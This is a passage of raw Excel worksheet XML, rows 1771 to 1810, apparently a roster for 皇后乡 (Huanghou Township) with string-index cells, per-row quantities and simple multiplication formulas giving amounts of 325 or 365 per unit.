      <c r="D1771" s="16" t="s">
        <v>4747</v>
      </c>
      <c r="E1771" s="16" t="s">
        <v>4748</v>
      </c>
      <c r="F1771" s="17" t="str">
        <f>F1770</f>
        <v>4113210615</v>
      </c>
      <c r="G1771" s="17"/>
      <c r="H1771" s="17"/>
      <c r="I1771" s="17"/>
      <c r="J1771" s="17"/>
      <c r="K1771" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1772" customHeight="1" spans="1:22">
      <c r="A1772" s="16" t="s">
        <v>4749</v>
      </c>
      <c r="B1772" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1772" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1772" s="17" t="s">
        <v>4750</v>
      </c>
      <c r="E1772" s="17" t="s">
        <v>4751</v>
      </c>
      <c r="F1772" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1772" s="17">
        <v>2</v>
      </c>
      <c r="H1772" s="18">
        <v>325</v>
      </c>
      <c r="I1772" s="17">
        <f>H1772*G1772</f>
        <v>650</v>
      </c>
      <c r="J1772" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1772" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1773" customHeight="1" spans="1:22">
      <c r="A1773" s="16" t="s">
        <v>4752</v>
      </c>
      <c r="B1773" s="17" t="str">
        <f>B1772</f>
        <v>皇后乡</v>
      </c>
      <c r="C1773" s="17" t="str">
        <f>C1772</f>
        <v>皇后乡</v>
      </c>
      <c r="D1773" s="16" t="s">
        <v>4753</v>
      </c>
      <c r="E1773" s="16" t="s">
        <v>4754</v>
      </c>
      <c r="F1773" s="17" t="str">
        <f>F1772</f>
        <v>4113210615</v>
      </c>
      <c r="G1773" s="17"/>
      <c r="H1773" s="17"/>
      <c r="I1773" s="17"/>
      <c r="J1773" s="17"/>
      <c r="K1773" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1774" customHeight="1" spans="1:22">
      <c r="A1774" s="16" t="s">
        <v>4755</v>
      </c>
      <c r="B1774" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1774" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1774" s="17" t="s">
        <v>4756</v>
      </c>
      <c r="E1774" s="17" t="s">
        <v>4757</v>
      </c>
      <c r="F1774" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1774" s="17">
        <v>1</v>
      </c>
      <c r="H1774" s="18">
        <v>365</v>
      </c>
      <c r="I1774" s="17">
        <f t="shared" ref="I1774:I1780" si="96">H1774*G1774</f>
        <v>365</v>
      </c>
      <c r="J1774" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1774" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1775" customHeight="1" spans="1:22">
      <c r="A1775" s="16" t="s">
        <v>4758</v>
      </c>
      <c r="B1775" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1775" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1775" s="17" t="s">
        <v>3738</v>
      </c>
      <c r="E1775" s="17" t="s">
        <v>4759</v>
      </c>
      <c r="F1775" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1775" s="17">
        <v>1</v>
      </c>
      <c r="H1775" s="18">
        <v>365</v>
      </c>
      <c r="I1775" s="17">
        <f t="shared" si="96"/>
        <v>365</v>
      </c>
      <c r="J1775" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1775" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1776" customHeight="1" spans="1:22">
      <c r="A1776" s="16" t="s">
        <v>4760</v>
      </c>
      <c r="B1776" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1776" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1776" s="17" t="s">
        <v>4761</v>
      </c>
      <c r="E1776" s="17" t="s">
        <v>4762</v>
      </c>
      <c r="F1776" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1776" s="17">
        <v>1</v>
      </c>
      <c r="H1776" s="18">
        <v>365</v>
      </c>
      <c r="I1776" s="17">
        <f t="shared" si="96"/>
        <v>365</v>
      </c>
      <c r="J1776" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1776" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1777" customHeight="1" spans="1:11">
      <c r="A1777" s="16" t="s">
        <v>4763</v>
      </c>
      <c r="B1777" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1777" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1777" s="17" t="s">
        <v>4764</v>
      </c>
      <c r="E1777" s="17" t="s">
        <v>4765</v>
      </c>
      <c r="F1777" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1777" s="17">
        <v>1</v>
      </c>
      <c r="H1777" s="18">
        <v>365</v>
      </c>
      <c r="I1777" s="17">
        <f t="shared" si="96"/>
        <v>365</v>
      </c>
      <c r="J1777" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1777" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1778" customHeight="1" spans="1:11">
      <c r="A1778" s="16" t="s">
        <v>4766</v>
      </c>
      <c r="B1778" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1778" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1778" s="17" t="s">
        <v>4767</v>
      </c>
      <c r="E1778" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F1778" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1778" s="17">
        <v>1</v>
      </c>
      <c r="H1778" s="18">
        <v>365</v>
      </c>
      <c r="I1778" s="17">
        <f t="shared" si="96"/>
        <v>365</v>
      </c>
      <c r="J1778" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1778" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1779" customHeight="1" spans="1:11">
      <c r="A1779" s="16" t="s">
        <v>4768</v>
      </c>
      <c r="B1779" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1779" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1779" s="17" t="s">
        <v>4769</v>
      </c>
      <c r="E1779" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F1779" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1779" s="17">
        <v>1</v>
      </c>
      <c r="H1779" s="18">
        <v>365</v>
      </c>
      <c r="I1779" s="17">
        <f t="shared" si="96"/>
        <v>365</v>
      </c>
      <c r="J1779" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1779" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1780" customHeight="1" spans="1:11">
      <c r="A1780" s="16" t="s">
        <v>4771</v>
      </c>
      <c r="B1780" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1780" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1780" s="17" t="s">
        <v>4772</v>
      </c>
      <c r="E1780" s="17" t="s">
        <v>4773</v>
      </c>
      <c r="F1780" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1780" s="17">
        <v>2</v>
      </c>
      <c r="H1780" s="18">
        <v>325</v>
      </c>
      <c r="I1780" s="17">
        <f t="shared" si="96"/>
        <v>650</v>
      </c>
      <c r="J1780" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1780" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1781" customHeight="1" spans="1:11">
      <c r="A1781" s="16" t="s">
        <v>4774</v>
      </c>
      <c r="B1781" s="17" t="str">
        <f>B1780</f>
        <v>皇后乡</v>
      </c>
      <c r="C1781" s="17" t="str">
        <f>C1780</f>
        <v>皇后乡</v>
      </c>
      <c r="D1781" s="16" t="s">
        <v>4775</v>
      </c>
      <c r="E1781" s="16" t="s">
        <v>4776</v>
      </c>
      <c r="F1781" s="17" t="str">
        <f>F1780</f>
        <v>4113210615</v>
      </c>
      <c r="G1781" s="17"/>
      <c r="H1781" s="17"/>
      <c r="I1781" s="17"/>
      <c r="J1781" s="17"/>
      <c r="K1781" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1782" customHeight="1" spans="1:11">
      <c r="A1782" s="16" t="s">
        <v>4777</v>
      </c>
      <c r="B1782" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1782" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1782" s="17" t="s">
        <v>4778</v>
      </c>
      <c r="E1782" s="17" t="s">
        <v>4779</v>
      </c>
      <c r="F1782" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1782" s="17">
        <v>1</v>
      </c>
      <c r="H1782" s="18">
        <v>365</v>
      </c>
      <c r="I1782" s="17">
        <f>H1782*G1782</f>
        <v>365</v>
      </c>
      <c r="J1782" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1782" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1783" customHeight="1" spans="1:11">
      <c r="A1783" s="16" t="s">
        <v>4780</v>
      </c>
      <c r="B1783" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1783" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1783" s="17" t="s">
        <v>4781</v>
      </c>
      <c r="E1783" s="17" t="s">
        <v>4782</v>
      </c>
      <c r="F1783" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1783" s="17">
        <v>1</v>
      </c>
      <c r="H1783" s="18">
        <v>365</v>
      </c>
      <c r="I1783" s="17">
        <f>H1783*G1783</f>
        <v>365</v>
      </c>
      <c r="J1783" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1783" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1784" customHeight="1" spans="1:11">
      <c r="A1784" s="16" t="s">
        <v>4783</v>
      </c>
      <c r="B1784" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1784" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1784" s="17" t="s">
        <v>4784</v>
      </c>
      <c r="E1784" s="17" t="s">
        <v>4785</v>
      </c>
      <c r="F1784" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1784" s="17">
        <v>2</v>
      </c>
      <c r="H1784" s="18">
        <v>325</v>
      </c>
      <c r="I1784" s="17">
        <f>H1784*G1784</f>
        <v>650</v>
      </c>
      <c r="J1784" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1784" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1785" customHeight="1" spans="1:11">
      <c r="A1785" s="16" t="s">
        <v>4786</v>
      </c>
      <c r="B1785" s="17" t="str">
        <f>B1784</f>
        <v>皇后乡</v>
      </c>
      <c r="C1785" s="17" t="str">
        <f>C1784</f>
        <v>皇后乡</v>
      </c>
      <c r="D1785" s="16" t="s">
        <v>4787</v>
      </c>
      <c r="E1785" s="16" t="s">
        <v>4788</v>
      </c>
      <c r="F1785" s="17" t="str">
        <f>F1784</f>
        <v>4113210615</v>
      </c>
      <c r="G1785" s="17"/>
      <c r="H1785" s="17"/>
      <c r="I1785" s="17"/>
      <c r="J1785" s="17"/>
      <c r="K1785" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1786" customHeight="1" spans="1:11">
      <c r="A1786" s="16" t="s">
        <v>4789</v>
      </c>
      <c r="B1786" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1786" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1786" s="17" t="s">
        <v>4790</v>
      </c>
      <c r="E1786" s="17" t="s">
        <v>4791</v>
      </c>
      <c r="F1786" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1786" s="17">
        <v>1</v>
      </c>
      <c r="H1786" s="18">
        <v>365</v>
      </c>
      <c r="I1786" s="17">
        <f>H1786*G1786</f>
        <v>365</v>
      </c>
      <c r="J1786" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1786" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1787" customHeight="1" spans="1:11">
      <c r="A1787" s="16" t="s">
        <v>4792</v>
      </c>
      <c r="B1787" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1787" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1787" s="17" t="s">
        <v>4793</v>
      </c>
      <c r="E1787" s="17" t="s">
        <v>4794</v>
      </c>
      <c r="F1787" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1787" s="17">
        <v>2</v>
      </c>
      <c r="H1787" s="18">
        <v>325</v>
      </c>
      <c r="I1787" s="17">
        <f>H1787*G1787</f>
        <v>650</v>
      </c>
      <c r="J1787" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1787" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1788" customHeight="1" spans="1:11">
      <c r="A1788" s="16" t="s">
        <v>4795</v>
      </c>
      <c r="B1788" s="17" t="str">
        <f>B1787</f>
        <v>皇后乡</v>
      </c>
      <c r="C1788" s="17" t="str">
        <f>C1787</f>
        <v>皇后乡</v>
      </c>
      <c r="D1788" s="16" t="s">
        <v>4796</v>
      </c>
      <c r="E1788" s="16" t="s">
        <v>4797</v>
      </c>
      <c r="F1788" s="17" t="str">
        <f>F1787</f>
        <v>4113210615</v>
      </c>
      <c r="G1788" s="17"/>
      <c r="H1788" s="17"/>
      <c r="I1788" s="17"/>
      <c r="J1788" s="17"/>
      <c r="K1788" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1789" customHeight="1" spans="1:11">
      <c r="A1789" s="16" t="s">
        <v>4798</v>
      </c>
      <c r="B1789" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1789" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1789" s="17" t="s">
        <v>4799</v>
      </c>
      <c r="E1789" s="17" t="s">
        <v>4773</v>
      </c>
      <c r="F1789" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1789" s="17">
        <v>2</v>
      </c>
      <c r="H1789" s="18">
        <v>325</v>
      </c>
      <c r="I1789" s="17">
        <f>H1789*G1789</f>
        <v>650</v>
      </c>
      <c r="J1789" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1789" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1790" customHeight="1" spans="1:11">
      <c r="A1790" s="16" t="s">
        <v>4800</v>
      </c>
      <c r="B1790" s="17" t="str">
        <f>B1789</f>
        <v>皇后乡</v>
      </c>
      <c r="C1790" s="17" t="str">
        <f>C1789</f>
        <v>皇后乡</v>
      </c>
      <c r="D1790" s="16" t="s">
        <v>4801</v>
      </c>
      <c r="E1790" s="16" t="s">
        <v>4802</v>
      </c>
      <c r="F1790" s="17" t="str">
        <f>F1789</f>
        <v>4113210615</v>
      </c>
      <c r="G1790" s="17"/>
      <c r="H1790" s="17"/>
      <c r="I1790" s="17"/>
      <c r="J1790" s="17"/>
      <c r="K1790" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1791" customHeight="1" spans="1:11">
      <c r="A1791" s="16" t="s">
        <v>4803</v>
      </c>
      <c r="B1791" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1791" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1791" s="17" t="s">
        <v>4804</v>
      </c>
      <c r="E1791" s="17" t="s">
        <v>4805</v>
      </c>
      <c r="F1791" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1791" s="17">
        <v>1</v>
      </c>
      <c r="H1791" s="18">
        <v>365</v>
      </c>
      <c r="I1791" s="17">
        <f>H1791*G1791</f>
        <v>365</v>
      </c>
      <c r="J1791" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1791" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1792" customHeight="1" spans="1:11">
      <c r="A1792" s="16" t="s">
        <v>4806</v>
      </c>
      <c r="B1792" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1792" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1792" s="17" t="s">
        <v>4807</v>
      </c>
      <c r="E1792" s="17" t="s">
        <v>4765</v>
      </c>
      <c r="F1792" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1792" s="17">
        <v>2</v>
      </c>
      <c r="H1792" s="18">
        <v>325</v>
      </c>
      <c r="I1792" s="17">
        <f>H1792*G1792</f>
        <v>650</v>
      </c>
      <c r="J1792" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1792" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1793" customHeight="1" spans="1:11">
      <c r="A1793" s="16" t="s">
        <v>4808</v>
      </c>
      <c r="B1793" s="17" t="str">
        <f>B1792</f>
        <v>皇后乡</v>
      </c>
      <c r="C1793" s="17" t="str">
        <f>C1792</f>
        <v>皇后乡</v>
      </c>
      <c r="D1793" s="16" t="s">
        <v>4809</v>
      </c>
      <c r="E1793" s="16" t="s">
        <v>4810</v>
      </c>
      <c r="F1793" s="17" t="str">
        <f>F1792</f>
        <v>4113210615</v>
      </c>
      <c r="G1793" s="17"/>
      <c r="H1793" s="17"/>
      <c r="I1793" s="17"/>
      <c r="J1793" s="17"/>
      <c r="K1793" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1794" customHeight="1" spans="1:11">
      <c r="A1794" s="16" t="s">
        <v>4811</v>
      </c>
      <c r="B1794" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1794" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1794" s="17" t="s">
        <v>4812</v>
      </c>
      <c r="E1794" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F1794" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1794" s="17">
        <v>2</v>
      </c>
      <c r="H1794" s="18">
        <v>325</v>
      </c>
      <c r="I1794" s="17">
        <f>H1794*G1794</f>
        <v>650</v>
      </c>
      <c r="J1794" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1794" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1795" customHeight="1" spans="1:11">
      <c r="A1795" s="16" t="s">
        <v>4813</v>
      </c>
      <c r="B1795" s="17" t="str">
        <f>B1794</f>
        <v>皇后乡</v>
      </c>
      <c r="C1795" s="17" t="str">
        <f>C1794</f>
        <v>皇后乡</v>
      </c>
      <c r="D1795" s="16" t="s">
        <v>4814</v>
      </c>
      <c r="E1795" s="16" t="s">
        <v>4815</v>
      </c>
      <c r="F1795" s="17" t="str">
        <f>F1794</f>
        <v>4113210615</v>
      </c>
      <c r="G1795" s="17"/>
      <c r="H1795" s="17"/>
      <c r="I1795" s="17"/>
      <c r="J1795" s="17"/>
      <c r="K1795" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1796" customHeight="1" spans="1:11">
      <c r="A1796" s="16" t="s">
        <v>4816</v>
      </c>
      <c r="B1796" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1796" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1796" s="17" t="s">
        <v>709</v>
      </c>
      <c r="E1796" s="17" t="s">
        <v>4743</v>
      </c>
      <c r="F1796" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1796" s="17">
        <v>2</v>
      </c>
      <c r="H1796" s="18">
        <v>325</v>
      </c>
      <c r="I1796" s="17">
        <f>H1796*G1796</f>
        <v>650</v>
      </c>
      <c r="J1796" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1796" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1797" customHeight="1" spans="1:11">
      <c r="A1797" s="16" t="s">
        <v>4817</v>
      </c>
      <c r="B1797" s="17" t="str">
        <f>B1796</f>
        <v>皇后乡</v>
      </c>
      <c r="C1797" s="17" t="str">
        <f>C1796</f>
        <v>皇后乡</v>
      </c>
      <c r="D1797" s="16" t="s">
        <v>4818</v>
      </c>
      <c r="E1797" s="16" t="s">
        <v>4819</v>
      </c>
      <c r="F1797" s="17" t="str">
        <f>F1796</f>
        <v>4113210615</v>
      </c>
      <c r="G1797" s="17"/>
      <c r="H1797" s="17"/>
      <c r="I1797" s="17"/>
      <c r="J1797" s="17"/>
      <c r="K1797" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1798" customHeight="1" spans="1:11">
      <c r="A1798" s="16" t="s">
        <v>4820</v>
      </c>
      <c r="B1798" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1798" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1798" s="17" t="s">
        <v>4821</v>
      </c>
      <c r="E1798" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F1798" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1798" s="17">
        <v>1</v>
      </c>
      <c r="H1798" s="18">
        <v>365</v>
      </c>
      <c r="I1798" s="17">
        <f>H1798*G1798</f>
        <v>365</v>
      </c>
      <c r="J1798" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1798" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1799" customHeight="1" spans="1:11">
      <c r="A1799" s="16" t="s">
        <v>4822</v>
      </c>
      <c r="B1799" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1799" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1799" s="17" t="s">
        <v>4823</v>
      </c>
      <c r="E1799" s="17" t="s">
        <v>4824</v>
      </c>
      <c r="F1799" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1799" s="17">
        <v>1</v>
      </c>
      <c r="H1799" s="18">
        <v>365</v>
      </c>
      <c r="I1799" s="17">
        <f>H1799*G1799</f>
        <v>365</v>
      </c>
      <c r="J1799" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1799" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1800" customHeight="1" spans="1:11">
      <c r="A1800" s="16" t="s">
        <v>4825</v>
      </c>
      <c r="B1800" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1800" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1800" s="17" t="s">
        <v>4826</v>
      </c>
      <c r="E1800" s="17" t="s">
        <v>4827</v>
      </c>
      <c r="F1800" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1800" s="17">
        <v>2</v>
      </c>
      <c r="H1800" s="18">
        <v>325</v>
      </c>
      <c r="I1800" s="17">
        <f>H1800*G1800</f>
        <v>650</v>
      </c>
      <c r="J1800" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1800" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1801" customHeight="1" spans="1:11">
      <c r="A1801" s="16" t="s">
        <v>4828</v>
      </c>
      <c r="B1801" s="17" t="str">
        <f>B1800</f>
        <v>皇后乡</v>
      </c>
      <c r="C1801" s="17" t="str">
        <f>C1800</f>
        <v>皇后乡</v>
      </c>
      <c r="D1801" s="16" t="s">
        <v>4829</v>
      </c>
      <c r="E1801" s="74" t="s">
        <v>4770</v>
      </c>
      <c r="F1801" s="17" t="str">
        <f>F1800</f>
        <v>4113210615</v>
      </c>
      <c r="G1801" s="17"/>
      <c r="H1801" s="17"/>
      <c r="I1801" s="17"/>
      <c r="J1801" s="17"/>
      <c r="K1801" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1802" customHeight="1" spans="1:11">
      <c r="A1802" s="16" t="s">
        <v>4830</v>
      </c>
      <c r="B1802" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1802" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1802" s="17" t="s">
        <v>4831</v>
      </c>
      <c r="E1802" s="17" t="s">
        <v>4832</v>
      </c>
      <c r="F1802" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1802" s="17">
        <v>2</v>
      </c>
      <c r="H1802" s="18">
        <v>325</v>
      </c>
      <c r="I1802" s="17">
        <f>H1802*G1802</f>
        <v>650</v>
      </c>
      <c r="J1802" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1802" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1803" customHeight="1" spans="1:11">
      <c r="A1803" s="16" t="s">
        <v>4833</v>
      </c>
      <c r="B1803" s="17" t="str">
        <f>B1802</f>
        <v>皇后乡</v>
      </c>
      <c r="C1803" s="17" t="str">
        <f>C1802</f>
        <v>皇后乡</v>
      </c>
      <c r="D1803" s="16" t="s">
        <v>4834</v>
      </c>
      <c r="E1803" s="16" t="s">
        <v>4835</v>
      </c>
      <c r="F1803" s="17" t="str">
        <f>F1802</f>
        <v>4113210615</v>
      </c>
      <c r="G1803" s="17"/>
      <c r="H1803" s="17"/>
      <c r="I1803" s="17"/>
      <c r="J1803" s="17"/>
      <c r="K1803" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1804" customHeight="1" spans="1:11">
      <c r="A1804" s="16" t="s">
        <v>4836</v>
      </c>
      <c r="B1804" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1804" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1804" s="17" t="s">
        <v>4837</v>
      </c>
      <c r="E1804" s="17" t="s">
        <v>4838</v>
      </c>
      <c r="F1804" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1804" s="17">
        <v>2</v>
      </c>
      <c r="H1804" s="18">
        <v>325</v>
      </c>
      <c r="I1804" s="17">
        <f>H1804*G1804</f>
        <v>650</v>
      </c>
      <c r="J1804" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1804" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1805" customHeight="1" spans="1:11">
      <c r="A1805" s="16" t="s">
        <v>4839</v>
      </c>
      <c r="B1805" s="17" t="str">
        <f>B1804</f>
        <v>皇后乡</v>
      </c>
      <c r="C1805" s="17" t="str">
        <f>C1804</f>
        <v>皇后乡</v>
      </c>
      <c r="D1805" s="16" t="s">
        <v>4840</v>
      </c>
      <c r="E1805" s="16" t="s">
        <v>4841</v>
      </c>
      <c r="F1805" s="17" t="str">
        <f>F1804</f>
        <v>4113210615</v>
      </c>
      <c r="G1805" s="17"/>
      <c r="H1805" s="17"/>
      <c r="I1805" s="17"/>
      <c r="J1805" s="17"/>
      <c r="K1805" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1806" customHeight="1" spans="1:11">
      <c r="A1806" s="16" t="s">
        <v>4842</v>
      </c>
      <c r="B1806" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1806" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1806" s="17" t="s">
        <v>4843</v>
      </c>
      <c r="E1806" s="17" t="s">
        <v>4844</v>
      </c>
      <c r="F1806" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1806" s="17">
        <v>2</v>
      </c>
      <c r="H1806" s="18">
        <v>325</v>
      </c>
      <c r="I1806" s="17">
        <f>H1806*G1806</f>
        <v>650</v>
      </c>
      <c r="J1806" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1806" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1807" customHeight="1" spans="1:11">
      <c r="A1807" s="16" t="s">
        <v>4845</v>
      </c>
      <c r="B1807" s="17" t="str">
        <f>B1806</f>
        <v>皇后乡</v>
      </c>
      <c r="C1807" s="17" t="str">
        <f>C1806</f>
        <v>皇后乡</v>
      </c>
      <c r="D1807" s="16" t="s">
        <v>4846</v>
      </c>
      <c r="E1807" s="16" t="s">
        <v>4847</v>
      </c>
      <c r="F1807" s="17" t="str">
        <f>F1806</f>
        <v>4113210615</v>
      </c>
      <c r="G1807" s="17"/>
      <c r="H1807" s="17"/>
      <c r="I1807" s="17"/>
      <c r="J1807" s="17"/>
      <c r="K1807" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1808" customHeight="1" spans="1:11">
      <c r="A1808" s="16" t="s">
        <v>4848</v>
      </c>
      <c r="B1808" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1808" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1808" s="17" t="s">
        <v>4849</v>
      </c>
      <c r="E1808" s="17" t="s">
        <v>4754</v>
      </c>
      <c r="F1808" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1808" s="17">
        <v>1</v>
      </c>
      <c r="H1808" s="18">
        <v>365</v>
      </c>
      <c r="I1808" s="17">
        <f>H1808*G1808</f>
        <v>365</v>
      </c>
      <c r="J1808" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1808" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1809" customHeight="1" spans="1:11">
      <c r="A1809" s="16" t="s">
        <v>4850</v>
      </c>
      <c r="B1809" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1809" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1809" s="17" t="s">
        <v>4851</v>
      </c>
      <c r="E1809" s="17" t="s">
        <v>4852</v>
      </c>
      <c r="F1809" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1809" s="17">
        <v>1</v>
      </c>
      <c r="H1809" s="18">
        <v>365</v>
      </c>
      <c r="I1809" s="17">
        <f>H1809*G1809</f>
        <v>365</v>
      </c>
      <c r="J1809" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1809" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1810" customHeight="1" spans="1:11">
      <c r="A1810" s="16" t="s">
        <v>4853</v>
      </c>
      <c r="B1810" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1810" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1810" s="17" t="s">
        <v>4854</v>
      </c>
      <c r="E1810" s="17" t="s">
        <v>4855</v>
      </c>
      <c r="F1810" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1810" s="17">
        <v>1</v>
      </c>
      <c r="H1810" s="18">
        <v>365</v>
      </c>
      <c r="I1810" s="17">
